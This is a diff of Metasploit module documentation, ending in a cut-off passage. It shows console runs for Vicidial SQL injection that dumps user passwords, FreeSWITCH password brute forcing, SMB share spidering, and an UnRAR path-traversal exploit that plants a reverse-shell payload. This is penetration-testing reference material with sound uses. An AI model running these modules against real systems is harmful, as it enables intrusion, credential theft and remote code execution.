+vicidial_users
+==============
+
+ user  pass
+ ----  ----
+ 6666  notpassword
+ VDAD  donotedit
+ VDCL  donotedit
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### ViciBox 9.0.3 - List Users - agent_time_sheet method
+
+```
+msf6 use auxiliary/scanner/http/vicidial_multiple_sqli
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set password notpassword
+password => notpassword
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - agent_time_sheet method
+action => List Users - agent_time_sheet method
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
+
+[*] Enumerating Usernames and Password Hashes
+[+] Dumped table contents:
+vicidial_users
+==============
+
+ user  pass
+ ----  ----
+ 6666  notpassword
+ VDAD  donotedit
+ VDCL  donotedit
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### ViciBox 9.0.3 - List Users - agentcall_email method
+
+```
+msf6 use auxiliary/scanner/http/vicidial_multiple_sqli
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set password notpassword
+password => notpassword
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - agentcall_email method
+action => List Users - agentcall_email method
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
+
+[*] Enumerating Usernames and Password Hashes
+[+] Dumped table contents:
+vicidial_users
+==============
+
+ user  pass
+ ----  ----
+ 6666  notpassword
+ VDAD  donotedit
+ VDCL  donotedit
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+
+### ViciBox 9.0.3 - List Users - user_stats method
+
+```
+msf6 use auxiliary/scanner/http/vicidial_multiple_sqli
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set password notpassword
+password => notpassword
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - user_stats method
+action => List Users - user_stats method
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
+
+[*] Enumerating Usernames and Password Hashes
+[+] Dumped table contents:
+vicidial_users
+==============
+
+ user  pass
+ ----  ----
+ 6666  notpassword
+ VDAD  donotedit
+ VDCL  donotedit
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,65 @@
+## Vulnerable Application
+[FreeSWITCH](https://freeswitch.com/) is a free and open-source software defined telecommunications stack for real-time communication,
+WebRTC, telecommunications, video, and Voice over Internet Protocol.
+
+The [Event Socket](https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket) `mod_event_socket` is a TCP based interface to
+control FreeSWITCH and is enabled by default.
+
+This module has been tested successfully on FreeSWITCH versions:
+* 1.10.7-release-19-883d2cb662~64bit on Debian 10.11 (buster)
+
+### Description
+
+This module is a login utility to find the password of the FreeSWITCH event socket service by bruteforcing the login interface.
+Note that this service does not require a username to log in; login is done purely via supplying a valid password.
+This module will stops as soon as a valid password is found.
+
+This service is enabled by default and listens on TCP port 8021 on the local network interface.
+
+Source and Installers:
+* [Source Code Repository](https://github.com/signalwire/freeswitch)
+* [Installers](https://freeswitch.org/confluence/display/FREESWITCH/Installation)
+* [Virtual Machine](https://freeswitch.com/index.php/fs-virtual-machine/)
+* [Docker](https://github.com/drachtio/docker-drachtio-freeswitch-mrf)
+
+Docker installation:
+```
+docker pull drachtio/drachtio-freeswitch-mrf
+docker run -d --rm --name FS1 --net=host \
+-v /home/deploy/log:/usr/local/freeswitch/log  \
+-v /home/deploy/sounds:/usr/local/freeswitch/sounds \
+-v /home/deploy/recordings:/usr/local/freeswitch/recordings \
+drachtio/drachtio-freeswitch-mrf freeswitch --sip-port 5038 --tls-port 5039 --rtp-range-start 20000 --rtp-range-end 21000 --password hunter
+```
+
+## Verification Steps
+1. Do: `use auxiliary/scanner/misc/freeswitch_event_socket_login`
+2. Do: `set RHOSTS [ips]`
+3. Do: `set PASS_FILE /home/kali/passwords.txt`
+4. Do: `run`
+
+## Options
+### PASS_FILE
+The file containing a list of passwords to try logging in with.
+
+## Scenarios
+### FreeSWITCH 1.10.7 Linux Debian 10.11 (Docker Image)
+```
+msf6 > use auxiliary/scanner/misc/freeswitch_event_socket_login
+msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > set RHOSTS 192.168.56.1
+RHOSTS => 192.168.56.1
+msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > set PASS_FILE /home/kali/passwords.txt
+PASS_FILE => /home/kali/passwords.txt
+msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > run
+
+[!] 192.168.56.1:8021        - No active DB -- Credential data will not be saved!
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: ClueCon (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: admin (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: 123456 (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: 12345 (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: 123456789 (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: password (Incorrect: -ERR invalid)
+[+] 192.168.56.1:8021        - 192.168.56.1:8021 - Login Successful: hunter (Successful: +OK accepted)
+[*] 192.168.56.1:8021        - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,74 @@
+## Vulnerable Application
+BACnet is a Data Communication Protocol for Building Automation and Control Networks.
+Developed under the auspices of the American Society of Heating,
+ Refrigerating and Air-Conditioning Engineers (ASHRAE), BACnet is an American national standard,
+ a European standard, a national standard in more than 30 countries, and an ISO global standard.
+ The protocol is supported and maintained by ASHRAE Standing Standard Project Committee 135
+
+This script polls bacnet devices with a l3 broadcast Who-is message
+and for each reply communicates further to discover more data and saves the data into metasploit.
+Each bacnet device responds with this data:
+- It's IP address, and BACnet/IP address (if the device is nested).
+- It's device number.
+- Model name.
+- Application software version.
+- Firmware revision.
+- Device description.
+## Verification Steps
+
+  1. Start msfconsole.
+  2. Do: `use auxiliary/scanner/scada/bacnet_l3`.
+  3. Do: `set INTERFACE`.
+  5. Do: `run`.
+  6. Devices running the BACnet protocol should respond with data.
+
+## Options
+A user can choose between the interfaces of his host (e.g. eth1, ens192...),
+the number of Who-is packets to send - for reliability purposes, the time (in seconds) to wait for packets to arrive
+and the UDP port, the default is 47808.
+
+The user can always check these options via the `show options` command.
+
+```
+msf auxiliary(profinet_siemens) > show options
+
+Module options (auxiliary/scanner/scada/bacnet_l3):
+
+Name       Current Setting  Required  Description
+----       ---------------  --------  -----------
+COUNT      1                yes       The number of times to send each packet
+INTERFACE  eth1             yes       The interface to scan from
+PORT       47808            yes       BACnet/IP UDP port to scan (usually between 47808-47817)
+TIMEOUT    1                yes       The socket connect timeout in seconds
+```
+
+## Scenarios
+
+The following demonstrates a basic scenario, we "detect" two devices:
+
+```
+
+msf > use auxiliary/scanner/scada/bacnet_l3
+msf auxiliary(auxiliary/scanner/scada/bacnet_l3) > run
+
+[*] Broadcasting Who-is via eth1
+[*] found 2 devices
+[*] Querying device number 826001 in ip 192.168.13.11
+[*] Querying device number 4194303 in ip 192.168.13.12
+[*] Done scanning
+[+] for asset number 826001:
+        model name: iSMA-B-4U4A-H-IP
+        firmware revision: 6.2
+        application software version: GC5 6.2
+        description: BACnet iSMA-B-4U4A-H-IP Module
+
+[+] for asset number 4194303:
+        model name: PXG3.L-1
+        firmware revision: FW=01.21.30.38;WPC=1.4.131;SVS-300:SBC=13.21;
+        application software version:
+        description: BacnetRouter
+
+[+] Successfully saved data to local store named bacnet-discovery.xml
+[*] Done.
+[*] Auxiliary module execution completed
+```
@@ -1,15 +1,49 @@
-## Description
+## Vulnerable Application
+
+This module has been tested successfully against:
+- Windows server 2019
+- Windows server 2016
+- Windows 10
+
+### Description

 The `smb_enumshares` module, as would be expected, enumerates any SMB shares that are available on a remote system.
 The module can also recursively go through each directory in each share and gather information about the files inside them.
 On some systems such as Windows 7, it can also iterate over user directories and `%appdata%`.

+## Options
+
+```
+set RHOSTS [string]
+```
+This is the target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit for more information.
+
+```
+set SpiderProfiles [boolean]
+```
+This is used to enable the module to only spider user profiles when share is a disk share.
+
+```
+set SpiderShares [boolean]
+```
+This is used to enable the module to spider shares recursively.
+
+```
+set ShowFiles [boolean]
+```
+This is used to enable the module to show detailed information when spidering.
+
+```
+set Share [string]
+```
+Can be set to only enumerate over a specific share.
+
 ## Verification Steps

-1. Do: ```use auxiliary/scanner/smb/smb_enumshares```
-2. Do: ```set RHOSTS [IP]```
-3. Do: ```set THREADS [number of threads]```
-4. Do: ```run```
+1. Do: `use auxiliary/scanner/smb/smb_enumshares`
+2. Do: `set RHOSTS [IP]`
+3. Do: `set THREADS [number of threads]`
+4. Do: `run`

 ## Scenarios

@@ -59,3 +93,31 @@ msf6 auxiliary(scanner/smb/smb_enumshares) > run
 [*] Auxiliary module execution completed
 ```
 The disconnect on port 139 happens because Windows 10 uses SMB3, which operates on port 445 instead.
+
+### Credentialed - Windows server 2019
+
+This scenario makes use of the `Share` option, that is used to pass a specific share to be enumerated. The module is
+also being ran with inline options in this scenario.
+
+```
+msf6 auxiliary(scanner/smb/smb_enumshares) > run smb://<Account>:<Password>@<TargetIP> spidershares=true showfiles=true share=<Share directory name>
+
+[*] <TargetIP>   - Starting module
+[-] <TargetIP>   - Login Failed: The SMB server did not reply to our request
+[*] <TargetIP>   - Starting module
+[!] <TargetIP>   - peer_native_os is only available with SMB1 (current version: SMB3)
+[!] <TargetIP>   - peer_native_lm is only available with SMB1 (current version: SMB3)
+[+] <TargetIP>   - my_share - (DISK)
+[+] <TargetIP>   -  \\VB\my_share
+==============
+
+ Type  Name            Created                    Accessed                   Written                    Changed                    Size
+ ----  ----            -------                    --------                   -------                    -------                    ----
+ FILE  Passwords.txt   2022-10-12T11:41:51+01:00  2022-10-12T11:41:51+01:00  2022-10-12T11:41:51+01:00  2022-10-12T17:08:44+01:00  0
+ FILE  paSsWords1.txt  2022-10-12T11:52:00+01:00  2022-10-12T11:52:00+01:00  2022-10-12T11:52:00+01:00  2022-10-12T17:08:59+01:00  0
+ FILE  test.txt        2022-10-07T17:49:36+01:00  2022-10-07T17:49:36+01:00  2022-10-07T17:49:36+01:00  2022-10-07T17:49:39+01:00  0
+
+[+] 192.168.175.129:445   - info saved in: /Users/<user>/.msf4/loot/20221026120037_default_192.168.175.129_smb.enumshares_935447.txt
+[*] smb://<Account>:<Password>@<TargetIP>: - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -25,6 +25,35 @@ openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -node
 If you receive `gethostbyname failure` error in `openssl`, add the client (metasploit)
 IP and hostname to your hosts file.

+### Using docker
+
+Using the environment created by [vulhub](https://github.com/vulhub/vulhub/tree/master/openssl/CVE-2014-0160)
+
+First create a new docker-compose file:
+
+```
+version: '2'
+services:
+ nginx:
+   image: vulhub/openssl:1.0.1c-with-nginx
+   ports:
+    - "8080:80"
+    - "8443:443"
+```
+
+Then run `docker-compose up` and verify that the service is running with:
+
+```
+$ curl https://localhost:8443 -k
+<html>
+<head><title>404 Not Found</title></head>
+<body bgcolor="white">
+<center><h1>404 Not Found</h1></center>
+<hr><center>nginx/1.11.13</center>
+</body>
+</html>
+```
+
 ## Verification Steps

  1. Install a vulnerable OpenSSL, start the service
@@ -0,0 +1,139 @@
+## Vulnerable Application
+
+### Description
+Check if a server supports a given version of SSL/TLS and cipher suites.
+
+The certificate is stored in loot, and any known vulnerabilities against that
+SSL version and cipher suite combination are checked. These checks include
+POODLE, deprecated protocols, expired/not valid certs, low key strength, null cipher suites,
+certificates signed with MD5, DROWN, RC4 ciphers, exportable ciphers, LOGJAM, and BEAST.
+
+## Options
+
+### SSLVersion
+
+Which SSL/TLS Version to use. `all` implies all SSL/TLS versions which are usable by the metasploit + ruby + OpenSSL
+versions installed on the system. List is dynamically generated. Defaults to `all`
+
+### SSLCipher
+
+Which SSL/TLS Cipher to use. `all` implies all ciphers avaiable for the version of SSL/TLS being used and which
+are usable by the metasploit + ruby + OpenSSL versions installed on the system.
+List is dynamically generated. Defaults to `all`
+
+## Verification Steps
+
+1. Do: `use auxiliary/scanner/ssl/ssl_version`
+2. Do: `set RHOSTS [IP]`
+3. Do: `set THREADS [num of threads]`
+4. Do: `run`
+
+## Scenarios
+
+### No issues found
+
+An example run against `google.com`, no real issues as expected.
+
+```
+msf6 > use auxiliary/scanner/ssl/ssl_version
+msf6 auxiliary(scanner/ssl/ssl_version) > set RHOSTS 172.217.12.238
+RHOSTS => 172.217.12.238
+msf6 auxiliary(scanner/ssl/ssl_version) > run
+
+[+] 172.217.12.238:443    - Connected with SSL Version: TLSv1.2, Cipher: ECDHE-RSA-AES256-GCM-SHA384
+[+] 172.217.12.238:443    - Certificate saved to loot: /home/gwillcox/.msf4/loot/20221107150747_default_172.217.12.238_ssl.certificate_342145.txt
+[*] 172.217.12.238:443    - Certificate Information:
+[*] 172.217.12.238:443    -   Subject: /CN=*.google.com
+[*] 172.217.12.238:443    -   Issuer: /C=US/O=Google Trust Services LLC/CN=GTS CA 1C3
+[*] 172.217.12.238:443    -   Signature Alg: sha256WithRSAEncryption
+[*] 172.217.12.238:443    -   Public Key Size: 2048 bits
+[*] 172.217.12.238:443    -   Not Valid Before: 2022-10-17 08:16:43 UTC
+[*] 172.217.12.238:443    -   Not Valid After: 2023-01-09 08:16:42 UTC
+[*] 172.217.12.238:443    -   CA Issuer: http://pki.goog/repo/certs/gts1c3.der
+[*] 172.217.12.238:443    -   Has common name *.google.com
+[+] 172.217.12.238:443    - Connected with SSL Version: TLSv1.2, Cipher: ECDHE-RSA-CHACHA20-POLY1305
+[+] 172.217.12.238:443    - Connected with SSL Version: TLSv1.2, Cipher: ECDHE-RSA-AES128-GCM-SHA256
+[+] 172.217.12.238:443    - Connected with SSL Version: TLSv1.2, Cipher: AES256-GCM-SHA384
+[+] 172.217.12.238:443    - Connected with SSL Version: TLSv1.2, Cipher: AES128-GCM-SHA256
+[*] 172.217.12.238:443    - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/ssl/ssl_version) > show options
+
+Module options (auxiliary/scanner/ssl/ssl_version):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   RHOSTS      172.217.12.238   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT       443              yes       The target port (TCP)
+   SSLCipher   All              yes       SSL cipher to test (Accepted: All, TLS_AES_256_GCM_SHA384, TLS_CHACHA20_POLY1305_SHA256, TLS_AES_128_GCM_SHA256, ECDHE-ECDSA-AES256-GCM-SHA384, ECDHE-RSA-A
+                                          ES256-GCM-SHA384, DHE-RSA-AES256-GCM-SHA384, ECDHE-ECDSA-CHACHA20-POLY1305, ECDHE-RSA-CHACHA20-POLY1305, DHE-RSA-CHACHA20-POLY1305, ECDHE-ECDSA-AES128-GCM-
+                                          SHA256, ECDHE-RSA-AES128-GCM-SHA256, DHE-RSA-AES128-GCM-SHA256, ECDHE-ECDSA-AES256-SHA384, ECDHE-RSA-AES256-SHA384, DHE-RSA-AES256-SHA256, ECDHE-ECDSA-AES1
+                                          28-SHA256, ECDHE-RSA-AES128-SHA256, DHE-RSA-AES128-SHA256, ECDHE-ECDSA-AES256-SHA, ECDHE-RSA-AES256-SHA, DHE-RSA-AES256-SHA, ECDHE-ECDSA-AES128-SHA, ECDHE-
+                                          RSA-AES128-SHA, DHE-RSA-AES128-SHA, RSA-PSK-AES256-GCM-SHA384, DHE-PSK-AES256-GCM-SHA384, RSA-PSK-CHACHA20-POLY1305, DHE-PSK-CHACHA20-POLY1305, ECDHE-PSK-C
+                                          HACHA20-POLY1305, AES256-GCM-SHA384, PSK-AES256-GCM-SHA384, PSK-CHACHA20-POLY1305, RSA-PSK-AES128-GCM-SHA256, DHE-PSK-AES128-GCM-SHA256, AES128-GCM-SHA256,
+                                           PSK-AES128-GCM-SHA256, AES256-SHA256, AES128-SHA256, ECDHE-PSK-AES256-CBC-SHA384, ECDHE-PSK-AES256-CBC-SHA, SRP-RSA-AES-256-CBC-SHA, SRP-AES-256-CBC-SHA,
+                                          RSA-PSK-AES256-CBC-SHA384, DHE-PSK-AES256-CBC-SHA384, RSA-PSK-AES256-CBC-SHA, DHE-PSK-AES256-CBC-SHA, AES256-SHA, PSK-AES256-CBC-SHA384, PSK-AES256-CBC-SHA
+                                          , ECDHE-PSK-AES128-CBC-SHA256, ECDHE-PSK-AES128-CBC-SHA, SRP-RSA-AES-128-CBC-SHA, SRP-AES-128-CBC-SHA, RSA-PSK-AES128-CBC-SHA256, DHE-PSK-AES128-CBC-SHA256
+                                          , RSA-PSK-AES128-CBC-SHA, DHE-PSK-AES128-CBC-SHA, AES128-SHA, PSK-AES128-CBC-SHA256, PSK-AES128-CBC-SHA)
+   SSLVersion  All              yes       SSL version to test (Accepted: All, SSLv3, TLSv1.0, TLSv1.2, TLSv1.3)
+   THREADS     1                yes       The number of concurrent threads (max one per host)
+
+msf6 auxiliary(scanner/ssl/ssl_version) > 
+```
+
+### Expired certificate
+
+```
+msf6 > use auxiliary/scanner/ssl/ssl_version
+msf6 auxiliary(scanner/ssl/ssl_version) > set RHOSTS expired.badssl.com
+RHOSTS => expired.badssl.com
+msf6 auxiliary(scanner/ssl/ssl_version) > run
+
+[+] 104.154.89.105:443    - Connected with SSL Version: TLSv1.2, Cipher: ECDHE-RSA-AES256-GCM-SHA384
+[+] 104.154.89.105:443    - Certificate saved to loot: /home/gwillcox/.msf4/loot/20221107150939_default_104.154.89.105_ssl.certificate_786557.txt
+[*] 104.154.89.105:443    - Certificate Information:
+[*] 104.154.89.105:443    -   Subject: /C=US/ST=California/L=San Francisco/O=BadSSL Fallback. Unknown subdomain or no SNI./CN=badssl-fallback-unknown-subdomain-or-no-sni
+[*] 104.154.89.105:443    -   Issuer: /C=US/ST=California/L=San Francisco/O=BadSSL/CN=BadSSL Intermediate Certificate Authority
+[*] 104.154.89.105:443    -   Signature Alg: sha256WithRSAEncryption
+[*] 104.154.89.105:443    -   Public Key Size: 2048 bits
+[*] 104.154.89.105:443    -   Not Valid Before: 2016-08-08 21:17:05 UTC
+[*] 104.154.89.105:443    -   Not Valid After: 2018-08-08 21:17:05 UTC
+[+] 104.154.89.105:443    -   Certificate contains no CA Issuers extension... possible self signed certificate
+[*] 104.154.89.105:443    -   Has common name badssl-fallback-unknown-subdomain-or-no-sni
+[+] 104.154.89.105:443    - Certificate expired: 2018-08-08 21:17:05 UTC
+[+] 104.154.89.105:443    - Connected with SSL Version: TLSv1.2, Cipher: DHE-RSA-AES256-GCM-SHA384
+[+] 104.154.89.105:443    - Connected with SSL Version: TLSv1.2, Cipher: ECDHE-RSA-AES128-GCM-SHA256
+[+] 104.154.89.105:443    - Connected with SSL Version: TLSv1.2, Cipher: DHE-RSA-AES128-GCM-SHA256
+[+] 104.154.89.105:443    - Connected with SSL Version: TLSv1.2, Cipher: ECDHE-RSA-AES256-SHA384
+[+] 104.154.89.105:443    - Connected with SSL Version: TLSv1.2, Cipher: DHE-RSA-AES256-SHA256
+[+] 104.154.89.105:443    - Connected with SSL Version: TLSv1.2, Cipher: ECDHE-RSA-AES128-SHA256
+[+] 104.154.89.105:443    - Connected with SSL Version: TLSv1.2, Cipher: DHE-RSA-AES128-SHA256
+[+] 104.154.89.105:443    - Connected with SSL Version: TLSv1.2, Cipher: AES256-GCM-SHA384
+[+] 104.154.89.105:443    - Connected with SSL Version: TLSv1.2, Cipher: AES128-GCM-SHA256
+[+] 104.154.89.105:443    - Connected with SSL Version: TLSv1.2, Cipher: AES256-SHA256
+[+] 104.154.89.105:443    - Connected with SSL Version: TLSv1.2, Cipher: AES128-SHA256
+[*] expired.badssl.com:443 - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/ssl/ssl_version) > show options
+
+Module options (auxiliary/scanner/ssl/ssl_version):
+
+   Name        Current Setting     Required  Description
+   ----        ---------------     --------  -----------
+   RHOSTS      expired.badssl.com  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT       443                 yes       The target port (TCP)
+   SSLCipher   All                 yes       SSL cipher to test (Accepted: All, TLS_AES_256_GCM_SHA384, TLS_CHACHA20_POLY1305_SHA256, TLS_AES_128_GCM_SHA256, ECDHE-ECDSA-AES256-GCM-SHA384, ECDHE-RS
+                                             A-AES256-GCM-SHA384, DHE-RSA-AES256-GCM-SHA384, ECDHE-ECDSA-CHACHA20-POLY1305, ECDHE-RSA-CHACHA20-POLY1305, DHE-RSA-CHACHA20-POLY1305, ECDHE-ECDSA-AES12
+                                             8-GCM-SHA256, ECDHE-RSA-AES128-GCM-SHA256, DHE-RSA-AES128-GCM-SHA256, ECDHE-ECDSA-AES256-SHA384, ECDHE-RSA-AES256-SHA384, DHE-RSA-AES256-SHA256, ECDHE-E
+                                             CDSA-AES128-SHA256, ECDHE-RSA-AES128-SHA256, DHE-RSA-AES128-SHA256, ECDHE-ECDSA-AES256-SHA, ECDHE-RSA-AES256-SHA, DHE-RSA-AES256-SHA, ECDHE-ECDSA-AES128
+                                             -SHA, ECDHE-RSA-AES128-SHA, DHE-RSA-AES128-SHA, RSA-PSK-AES256-GCM-SHA384, DHE-PSK-AES256-GCM-SHA384, RSA-PSK-CHACHA20-POLY1305, DHE-PSK-CHACHA20-POLY13
+                                             05, ECDHE-PSK-CHACHA20-POLY1305, AES256-GCM-SHA384, PSK-AES256-GCM-SHA384, PSK-CHACHA20-POLY1305, RSA-PSK-AES128-GCM-SHA256, DHE-PSK-AES128-GCM-SHA256,
+                                             AES128-GCM-SHA256, PSK-AES128-GCM-SHA256, AES256-SHA256, AES128-SHA256, ECDHE-PSK-AES256-CBC-SHA384, ECDHE-PSK-AES256-CBC-SHA, SRP-RSA-AES-256-CBC-SHA,
+                                             SRP-AES-256-CBC-SHA, RSA-PSK-AES256-CBC-SHA384, DHE-PSK-AES256-CBC-SHA384, RSA-PSK-AES256-CBC-SHA, DHE-PSK-AES256-CBC-SHA, AES256-SHA, PSK-AES256-CBC-SH
+                                             A384, PSK-AES256-CBC-SHA, ECDHE-PSK-AES128-CBC-SHA256, ECDHE-PSK-AES128-CBC-SHA, SRP-RSA-AES-128-CBC-SHA, SRP-AES-128-CBC-SHA, RSA-PSK-AES128-CBC-SHA256
+                                             , DHE-PSK-AES128-CBC-SHA256, RSA-PSK-AES128-CBC-SHA, DHE-PSK-AES128-CBC-SHA, AES128-SHA, PSK-AES128-CBC-SHA256, PSK-AES128-CBC-SHA)
+   SSLVersion  All                 yes       SSL version to test (Accepted: All, SSLv3, TLSv1.0, TLSv1.2, TLSv1.3)
+   THREADS     1                   yes       The number of concurrent threads (max one per host)
+
+msf6 auxiliary(scanner/ssl/ssl_version) > 
+```
@@ -0,0 +1,141 @@
+## Vulnerable Application
+
+This module exploits a symlink-based path traversal vulnerability in UnRAR 6.11 and earlier (open source version 6.1.6 and earlier). You can get the vulnerable versions here:
+
+* [Vulnerable unRAR version](https://www.rarlab.com/rar/rarlinux-x64-611.tar.gz)
+* [Github commit](https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946)
+
+This module creates a generic RAR file containing whatever `PAYLOAD` the user configured.
+
+## Verification Steps
+
+To generate the .rar file:
+
+```
+msf6 > use exploit/linux/fileformat/unrar_cve_2022_30333
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set RHOSTS 10.0.0.154
+RHOSTS => 10.0.0.154
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_PATH ../../../../../../tmp/docstest.txt
+TARGET_PATH => ../../../../../../tmp/docstest.txt
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > exploit
+
+[*] Target filename: ../../../../../../tmp/docstest.txt
+[+] payload.rar stored at /home/ron/.msf4/local/payload.rar
+```
+
+Then, with a vulnerable versions of UnRAR (see the link above), extract it:
+
+```
+ron@fedora ~/shared/analysis/zimbra-unrar/rar $ ./unrar x -o+ ~/.msf4/local/payload.rar
+
+UNRAR 6.11 freeware      Copyright (c) 1993-2022 Alexander Roshal
+
+Extracting from /home/ron/.msf4/local/payload.rar
+
+Extracting  hhgdzigwkgv                                               OK 
+Extracting  hhgdzigwkgv                                               OK 
+All OK
+ron@fedora ~/shared/analysis/zimbra-unrar/rar $ ls -l hhgdzigwkgv 
+lrwxrwxrwx. 1 ron games 34 Jul 27 13:04 hhgdzigwkgv -> ../../../../../../tmp/docstest.txt
+
+ron@fedora ~/shared/analysis/zimbra-unrar/rar $ file /tmp/docstest.txt
+/tmp/docstest.txt: data
+```
+
+## Options
+
+### `FILENAME`
+
+The filename to generate, typically it's `payload.rar` and that works fine.
+
+### `TARGET_PATH`
+
+The path, including traversal characters (`../`) and the filename. The slashes' direction doesn't matter, that gets fixed in the module.
+
+### `SYMLINK_FILENAME`
+
+If set, use a specific filename for the symlink inside the RAR file - default (random) is almost always best.
+
+### `CUSTOM_PAYLOAD`
+
+If set, instead of encoding the configured payload, encode data from the given filename.
+
+## Scenarios
+
+This is a pretty generic exploit that can be used against any software with a bad version of UnRAR.
+
+We also built a specific exploit for Zimbra - `exploit/linux/http/zimbra_unrar_cve_2022_30333`.
+
+### Built-in payload
+
+```
+msf6 > use exploit/linux/fileformat/unrar_cve_2022_30333
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_PATH ../../../../../../../../tmp/evil.bin
+TARGET_PATH => ../../../../../../../../tmp/evil.bin
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > exploit
+
+[*] Target filename: ../../../../../../../../tmp/evil.bin
+[*] Encoding configured payload
+[+] payload.rar stored at /home/ron/.msf4/local/payload.rar
+```
+
+Then:
+
+```
+ron@fedora ~/.msf4/local $ ~/tools/unrar/unrar x -o+ ./payload.rar
+
+UNRAR 6.11 freeware      Copyright (c) 1993-2022 Alexander Roshal
+
+
+Extracting from ./payload.rar
+
+Extracting  xkmcxqotn                                                 OK 
+Extracting  xkmcxqotn                                                 OK 
+All OK
+ron@fedora ~/.msf4/local $ file /tmp/evil.bin
+/tmp/evil.bin: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
+```
+
+### Custom payload
+
+```
+msf6 > use exploit/linux/fileformat/unrar_cve_2022_30333
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_PATH ../../../../../../../../tmp/evil.sh
+TARGET_PATH => ../../../../../../../../tmp/evil.sh
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > echo -ne "#!/bin/bash\nwhoami\n" > /tmp/test.sh
+[*] exec: echo -ne "#!/bin/bash\nwhoami\n" > /tmp/test.sh
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set CUSTOM_PAYLOAD /tmp/test.sh
+CUSTOM_PAYLOAD => /tmp/test.sh
+```
+
+Then:
+
+```
+ron@fedora ~/.msf4/local $ ~/tools/unrar/unrar x -o+ ./payload.rar
+
+UNRAR 6.11 freeware      Copyright (c) 1993-2022 Alexander Roshal
+
+
+Extracting from ./payload.rar
+
+Extracting  jwbhkf                                                    OK 
+Extracting  jwbhkf                                                    OK 
+All OK
+ron@fedora ~/.msf4/local $ bash /tmp/evil.sh
+ron
+/tmp/evil.sh: line 4: $'\177P\336': command not found
+[...]
+```
+
+(The errors at the bottom are because we append random junk to the end for padding)
+
+
@@ -0,0 +1,184 @@
+## Vulnerable Application
+
+This module exploits a remote code execution vulnerability (CVE-2022-33891) of Apache Spark.
+The Apache Spark UI offers the possibility to enable ACLs via the configuration option `spark.acls.enable`.
+With an authentication filter, this checks whether a user has access permissions to view or modify the application.
+The permission check is coded using a bash command shell and the unix id command that allows a malicious shell command injection.
+
+Ironically the `spark.acls.enable` configuration setting is designed to improve the security access within the Spark application,
+but unfortunately this configuration setting triggers the vulnerable code below.
+
+```
+private def getUnixGroups(username: String): Set[String] = {
+    val cmdSeq = Seq("bash", "-c", "id -Gn " + username)
+    // we need to get rid of the trailing "\n" from the result of command execution
